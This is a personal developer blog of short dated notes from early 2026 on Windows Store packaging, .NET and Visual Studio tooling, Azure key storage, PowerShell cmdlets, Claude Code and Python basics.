Friday, 13 February 2026

Windows Baseline Security

Windows Baseline Security is something new for the Age of AI Agents.

The AI Agent Prevention Society

One of the obstacles to AI agents becoming all powerful is the technology infrastructure that actively seeks to obstruct agents.

This technology has various names, one being WAF, or web application firewall.  

The purpose of a WAF is to stop web applications from common attacks. 

Recall the OWASP Top Ten Risks? Some of the motivation behind these protections are good - for example, guarding against bot-driven DDoS attacks.

There are various vendors and products in this space; such as Imperva WAF, Cloudflare, Akamai Site Defender, AWS WAF, Azure Web Application Firewall and Google Cloud Armor.

These solutions are all effective at detecting and blocking agents, headless browsers, scrapers, credential stuffing bots (where leaked usernames and passwords are used across numerous websites to exploit potential duplication) and automated (even if legitimate) login attempts.

Action taken could range from limiting requests based on IP, presenting CAPTCHA challenges and blocking certain geographies.  However, these actions may prevent legitimate bots from using required services, or performing agentic actions on behalf of legitimate users.

Hushlogins

Wednesday, 11 February 2026

CloudFlare R2

The CloudFlare R2 Developer's Guide is good reading for developers needing to use this CDN.

Applications include storage for cloud native applications, podcast content as well as storage for batch process output.

Core concepts are Buckets and Objects.

Accelerating "safe AI adoption" is one of the company's current mantras.

Immutable Github Releases

Some software is distributed as immutable Github releases (this is for software supply chain security). One such example is Inno Setup.

Windows SDK

Windows SDK is needed for MSIX packaging. Windows 11 SDK includes Windows Performance Toolkit, Application Verifier for Windows and Debugging Tools for Windows.

Ingress and Egress Fees

Ingress and egress fees refer to the cost of data transfer into and out of the cloud.
  • Ingress fees are typically zero - allowing users to upload data to Amazon S3 or Azure Blob Storage with no additional charge. 
  • Egress fees are typically charged when data exits the cloud. These fees can differ significantly between providers and source and destination region.
Hosting on S3 will set you back $0 for 1 GB download per month, and around 1000 downloads of a 50MB file will cost you just under $5 a month.

Microsoft Store Policies

Microsoft Store (Windows Store) has policies on Product and Content, which developers must abide by.

There are a few rules around IAP - short for "in app purchases".

What is DXCore ... really?

Suppose you run wsl --version and see your DXCore version listed as 10.0.26100.  

This happens to be a similar version code to your Windows version. 

So, what is DXCore?

DXCore is the low-level engine inside Windows that talks directly to graphics hardware. It is the foundation layer that modern graphics APIs (like Direct3D 12) run on.

The IARC and Windows Software

The IARC is the International Age Rating Coalition, a global initiative to streamline age ratings for games and applications. Over 19m games and apps have so far been published using IARC. Developers must abide by the IARC Terms of Use.

Tuesday, 10 February 2026

Uploading App Packages to the Windows Store

There are a bunch of rules to follow when uploading packages to the Windows Store.

One hard requirement is a "Package URL" which is a versioned, secure URL pointing to the app package (MSI/EXE) hosted on your CDN.

An example could be https://windowscottoneyejoe/downloads/1.1/setup.exe

When a customer installs a package, the Store downloads the package from the URL. Good CDN practices should be followed - to ensure the URL is performant, reliable and available in your relevant target markets.

(Sidebar - Google have some great recommendations on CDN best practices (they also have their own commercial CDN products known as Cloud CDN and Media CDN, other vendors offer CDN services too, including CloudFlare).

Note: as your application versions evolve, you may need to update the package URL. This is done by using the Update submission option in Partner Center to specify the new package URL.

Windows Store Apps - Pricing

If you are a Windows Store developer, you have a few pricing options: Free, Freemium (optional in-app purchases, Subscription or Paid (one time payment).

Quick Guide to the GDK

The GDK, or Game Development Kit, enables developers to develop games on Xbox and Windows.

The Whats New page covers new developments to the GDK.

Monday, 9 February 2026

Do Not Commit csproj.user file

This contains per developer, per machine settings.

For example, when you last run a Debug session, it will have a record of what you selected in the dropdown next to the Run/Debug button under _lastSelectedProfile. This may also contain user-specific folder paths as well.

What is Ready to Run (R2R) Compilation in Visual Studio?

Ready-to-run compilation is a feature in .NET that improves startup performance by compiling them in Ready-to-run format. This is a form of AOT (ahead-of-time) compilation that reduces work for the JIT compiler as the application loads. Your binary contains IL and precompiled IL. It only works if you target specific environments such as Linux x64 or Windows x64.

Rust uses C++

Tales of the end of C++ are greatly exaggerated. Rust uses C++ in the shape of LLVM which is built in C++. Sure, the Rust compiler (rustc - which was initially OCaml'd and rewritten in Rust) is mostly Rust with some legacy bits in C++, but the backend (LLVM) used for code generation is C++ code. The standard library has some C bindings too, but that's by the by.

The Return of C++ Tools in Visual Studio

Today - C# programmers must embrace C++ development tools. There is No Alternative.  C++ tools container the valuable link.exe to create standalone .exe files.  Publishing .NET programs as standalone EXEs needing no runtime need this toolkit. Install it! Give up that 1.5 GB of space for some C++ tooling!

How Does GitHub Copilot Analyze Unexpected Behaviour

Suppose you have a release EXE file that has an unexpected dependency at runtime on a DLL. Github Copilot will analyze your project file (Csproj) for build settings and request permissions to view the build log output from your most recent build. It then makes recommendations (e.g. fill in a missing step in the build to remediate your problem).

Where did the .csproj file go in Visual Studio??

Ooh tricky one.  Go to Solution Explorer. 

Double click on your project under Solution XYZ (1 of N projects).

It pops up.

If still stuck - GitHub Copilot always knows where it's hiding.

GitHub Copilot Integration in Visual Studio

GitHub Copilot integrates neatly into Visual Studio - if a little slowly.  A little green tick in the top right of your IDE shows you that Copilot is active.  You also get a "Copilot Consumptions" screen that shows you your consumption in terms of requests and code completions.

Control-Shift-A

Create a new resource in the Solution Explorer in Visual Studio.

Windows Application Packaging Project

The best way to build an MSIX.

Lift the Hood, Change the Oil

...understand all the components... This technology is so important to the future. You must have some tactical understanding of it. Recommends Jensen Huang, 2026.

The Most Important Part of AI is Applications

 ..all the layer underneath is just infrastructure stuff (Jensen Huang, 2026).

How Users Can do Side-Loading

Here's a how to.

  • Double-click the .msix or .msixbundle file
  • Install via PowerShell: Add-AppxPackage
  • Deploy and distribute internally
Add-AppxPackage is a cmdlet.


WinUI Blank App (Packaged)

This is project template for creating a WinUI app along with a MSIX package for side-loading or distribution via the Microsoft Store.

Side-loading in the above case refers to installing an app outside of the Microsoft Store, usually by providing the MSIX package to users.


A Closer Look at System.Drawing's Bitmap Class

The System namespace is your root namespace for all foundational features in .NET. Primitive types (Int32, String, Boolean) as well as core base classes (Object, Exception) are found here.

The System.Drawing namespace is the home of GDI+ functionality (GDI+ is the enhanced form of the Windows Graphics Device Interface, or GDI, in use since Windows XP i.e. since 2001).

Within this, you have the Bitmap class, which represents a GDI+ bitmap where a bitmap is simply an image defined by pixel data.  The code lives in System.Drawing.Common.dll.

It is a sealed class, which prevents it from being inherited.

If you are missing the relevant package in your .NET project, run the following command in your project directory: 

dotnet add package System.Drawing.Common

(dotnet add package, adds package references to a designated project file, or searches the current directory for one if not specified).

Recover Solution Explorer

If you have closed Solution Explorer (for example, to have a more complete view of your code) then Control-Alt-L is the classic key combination to recover the Solution Explorer.

Enable Native AOT Publish

Native AOT (Ahead-of-time) deployment compiles your app to native code avoiding the need for a runtime. Compilation takes longer but the app runs faster, and with lower memory usage. Debugging may be more complicated relative to regular .NET applications.

The Solution Explorer project file contains the essential code required for this.

<PublishAot>true</PublishAot>

More details on AOT deployment here.

Top Level Statements (TLS) in .NET

Top level statements were introduced in .NET 9 as a way to avoid Main methods in .NET programs. This makes .NET programs look more like simple scripts.

STS versus LTS in .NET Versioning (STANDARD vs LONG)

STS and LTS have very specific meanings in .NET versioning. WinJoes must be truly on top of these different versioning schemes.

For example, WinJane may be faced with a choice to build a console app with .NET 8.0 (LTS) or .NET 9.0 (STS) and should understand the trade-offs between the two.

STS = Standard Term Support (NOT short term support, which might be seen as the natural counter to LTS).

STS releases have a shorter support window, faster iteration and more frequent updates. It is needed for developers needing newest features and ok with no multi-year stability guarantees. It is intended to keep the platform evolving quickly. Since .NET 5, STS releases have odd version numbers.

STS releases have a typical lifetime around 18 months, and LTS around 3 years.

Software teams have different strategies: 1) anchor on LTS for stability, 2) use STS to ride the innovation wave. Microsoft keep odd numbered versions as STS and even numbered as LTS.

Saturday, 7 February 2026

Keep up to Speed with C# Language Design Discussions

The content of language meetings are detailed here.

Thursday, 5 February 2026

Personal AI Assistants

Personal AI assistants are here, but security controls are askew.  OpenClaw is an example of such an assistant.  It acts as a bridge between messaging devices (such as WhatsApp, Telegram, iMessage) and AI agents. Ollama integrates with it.

Sunday, 1 February 2026

GGUF = GPT-Generated Unified Format

GGUF is a special model file format used to run LLMs efficiently on your own computer. It stands for GPT-Generated Unified Format. It is the successor to GGML. Privacy-sensitive workflows are one application of these optimized-for-local execution model packages.

Friday, 30 January 2026

Using ssh-keygen from WSL to generate an SSH key

SSH keys are useful to enable access to networked resources.  

The command ssh-keygen (the OpenSSH authentication key utilit) can be used to generate keys.

Example usage:  ssh-keygen -t ed25519 -C "myemail@mydomain.com".  

The -t option signifies type, and ed25519 refers to the algorithm based on Elliptic Curve Cryptography using an Edwards curve (the recommended default - it competes with RSA which is needed for compatibility with older systems). The -C flag provides a new comment. 

What gets generated is actually a pair of keys, a private key (stored locally) and a public key (stored on the server, but reference copy is typically stored locally too, in your .ssh directory).  It is an asymmetric authentication (not encryption) protocol.

info ssh-keygen will help you decode other command line options for generating keys.

The generated keys are stored in ~/.ssh.

Managed HSM as a secure key storage option in Azure

Managed HSM (Hardware Security Module) is when you need the highest level of key protection in Azure. 

FIPS 140-3 Level 3 hardware is utilised.  

These are stringent security requirements set by NIST. They include: physical security through hardened enclosure and tamper-evident seals and active tamper-detection. The tamper detection includes detection of physical intrusion, temperature and voltage anomalies.

Azure Key Vault

Azure Key Vault can store keys (e.g. API keys) securely which can then be retrieved by applications at runtime. Passwords and certificates can also be stored in the vault.

Objects in the vault are uniquely identified by a case-insensitive identifier called the object identifier. It has a prefix identifying the key vault, object type, user-provided object name, and object version. 

The key vault section starts with https://{vault-name}.vault.azure.net or https://{hsm-name}.managedhsm.azure.net, for Managed HSM Pools.

Object types are "keys", "secrets" or "certificates". 

Object name must be unique within the key vault. Only digits, letters and dashes are allowed in the object name. The object name must be between 1-127 characters. 

LiteLLM

LiteLLM lets you make calls into a variety of LLMs using OpenAI conventions. Think of it as a lightweight model router. LangChain is somewhat similar - but with a bunch of added stuff on agents and orchestration.

Thursday, 29 January 2026

OpenAI's Advice on Key Safety

OpenAI has a set of recommendations on key safety. There are basically two types of keys: API keys and admin keys (to check usage limits, quotas etc.). Read more on those recommendations here, also summarised below.

The first recommendation (rule) is do not share API keys. API keys are unique to users, even if those users are on the same team.

The second recommendation is that the OpenAI API key should not be exposed in client-side environments like browsers or mobile apps, which could allow malicious users to make requests as you.

Wednesday, 28 January 2026

Excel Data Validation Rules

Where to find data validation rules in Excel's ribbon? 

Data -> Data Tools -> click on the drop-down with a green tick and a red no-entry sign, then select Data Validation.

You can choose to allow any values, or restrict values e.g. to a list.

Software as a Production Line

Think of software as a production line. You want to automate all parts of that production line. And there are lots of pieces to automate.  Continuous integration and continuous deployment are components of that, but there are other elements not covered by CICD which also need automation. Automate everything.

iex in PowerShell

iex in PowerShell is Invoke-Expression - a cmdlet that takes a string and executes it like a PowerShell expression.  It's often used to run code fetched from external sources.

How Claude Code Works

Read more here.

Claude Code is an agentic assistant running in your terminal. It is an "agentic harness" around Claude.

Programming Work and AI

Using AI for programming makes you realise (if you haven't already) how much of programming work is mechanical.  

AI then becomes a high-level design partner once that low-level development is conquered.

At an even higher level, AI is the business partner that helps you decide what to build.

irm in PowerShell

The irm command in PowerShell is an alias for the cmdlet Invoke-RestMethod. This is used to send HTTP and HTTPS commands to RESTful web services and retrieve the response. It is used to interact with APIs and download data from the web.

Claude Code

Learn about Claude Code here.  When you log in to Claude for the first time, it asks you to identify three areas of interest. This could range from coding, learning to business strategy.

The conditions Claude will ask you to approve will be to acknowledge:
  • Service may impose rate limits or usage quotas
  • Output accuracy is disclaimed
  • Output may be refused if it violates safety policy

Various Python Text UI Options

We have covered Textual in an earlier post.  Some other frameworks to build text UIs in Python include:

  • Curses - a wrapper around Unix ncurses
  • Rich - rich text formatting in the terminal

Python Textual Framework

Textual is built by Textualise.io. Applications can be run in a terminal or web browser. Here is a tutorial.

Blogger API and OAuth2

Read more here.  The latest Blogger API is v3. OAuth2 ("Open Authorization") is a standard protocol replacing OAuth 1.0 in 2012.

JDK Switcheroo for "Xamarin"

Read more here on the move from Oracle's JDK to a more lightweight version intended solely for Android development.

Your version of Visual Studio is no longer supported or serviced

Visual Studio has to be constantly updated. This is for security fixes, quality updates and experimental features. Sometimes, stuff gets removed, too.

Friday, 23 January 2026

Character format issues in emacs

The command cat -v is very useful to show control characters in a file. For example, if you want to debug unusual speech marks (Unicode used instead of ASCII) this is one way to do it.

Replit versus GitHub Codespaces

Replit lets you build and run applications in the cloud, from within a web browser. GitHub Codespaces replicates VS Code in the cloud / kind of replicating a full dev setup in the cloud.

dataclasses in Python

Classes that hold data - cool, right? But boring to implement. Python dataclasses have the solution. But check too what Pydantic has to offer. They are described in PEP557.

What is Pydantic?

Pydantic is used in a number of Python frameworks and libraries - for example, it is used in Langchain extensively.

Pydantic is a widely used data validation library.  

It makes extensive use of the annotations feature in Python. It is worthwhile to understand them in the context of type hints.

Tuesday, 13 January 2026

Deployment Toolkit (MDT) Support Removed - Try Windows Autopilot

Microsoft has removed support for its legacy enterprise deployment toolkit known as MDT (Microsoft Deployment Toolkit). 

This means no more updates (including for future versions of Windows) or security patches. 

Microsoft have recommended Windows Autopilot for cloud based deployment, or Configuration Manager operating system deployment (OSD) for on-prem infrastructure requirements, as alternatives.

Autopilot can be used to deploy Windows PCs as well as Hololens 2.

Fans lament that MDT was free and did not force Azure cloud adoption.

Friday, 9 January 2026

What is SASE?

SASE is Secure Access Service Edge, which delivers networking and security through a cloud service.

Tuesday, 6 January 2026

Analytics Libraries Expect Regularised Data

This is a recurrent theme in quantitative computing. 

Analytics libraries expect clean, regularised data, e.g. time series with no missing values.  Real-life data often has gaps and idiosyncrasies - it needs to cleaned often (to create a golden source) but even then subsequently rejigged based on the consumer need. 

This is akin to the Adapter Design Pattern in programming. In the Adapter you adapt an "interface" to another "interface" - for example, an XML dataset is "adapted" into a JSON dataset for JSON consumers.

Statistical libraries in particular are particularly picky about datasets and consistency, particularly when comparing datasets and trying to find relationships or errors between actual and expected values.

What a DataFrame truly is in Python

A DataFrame is actually a pandas.core.frame.DataFrame.

Monday, 5 January 2026

The list() constructor in Python

The list constructor in Python is interesting because there are evidently more obvious ways to create lists, namely via square bracket notation.  However, using the constructor directly has a number of use cases.

Here are some syntactical examples of using the list constructor.

empty_list = list()
tuple_to_list = list( (1,2,3) )
string_to_list = list("constructor") # creates a list made of individual letters as elements

Testing Prediction Models - Out of Sample Testing

When testing a prediction model, it is a good idea to do "out of sample" testing. 

This involves testing a model or strategy on data that was not used during model building or training. It thus evaluates how well the model performs on new, unseen data.

Python Internal Modules - The Underscore Convention

After debugging Python for a while you will certainly see some files with leading underscores. 

This is a Python convention to indicate the file is not part of the public interface of the module.  An example could be _mixins.py for a mixins class (this is used in pandas for example).  

When doing a "from package import *" any file with an underscore is not imported, respecting this convention. 

Sometimes an underscore can also be used to prevent name collisions e.g. implementing some JSON helpers in _json.py to avoid conflict with another json.py (pandas has this file too).

Pat yourself on the back if you have debugged into an underscore-prefixed file - you have ventured into the hidden depths of a package's implementation details. Good Job!

Python Debugger Survival Skills

There are many times you will need to use the Python debugger to understand why something is not working (oftentimes in a third-party library).

pdb - invokes the debugger
n - moves to the next line (can press carriage return - same effect)
s - steps into the code

It will certainly help you explore and understand more about how the third-party libraries work.

ARIMA in Python: Endogenous versus Exogenous Variables

The ARIMA model in statsmodels is described here.

Its constructor has the following initial arguments: ARIMA( endog, exog=None, order=(0,0,0),....).

  • endog - observed time series process, y
  • exog - array of "exogenous regressors"
  • order - (p, d, q) model for autoregressive, differences and moving average component
Exogeneous regressors are added to the ARIMA equation where external variables may have some forecasting power. For example, electricity demand could utilise temperature as an exogenous variable.

The (p, d, q) component specification can be said to be the true "spirit" of ARIMA.

ARIMA methods were created by George Box and Gwilym Jenkins and are hence sometimes called  Box-Jenkins methods.

SARIMA extends this to Seasonal Data, where seasonal differencing is used to create stationarity.

Sunday, 4 January 2026

Claude Code

Claude Code is built for developers - try it.

You can run it from a terminal (formerly only WSL).

Due to prompt injection risks, do not use it on codebases you do not trust.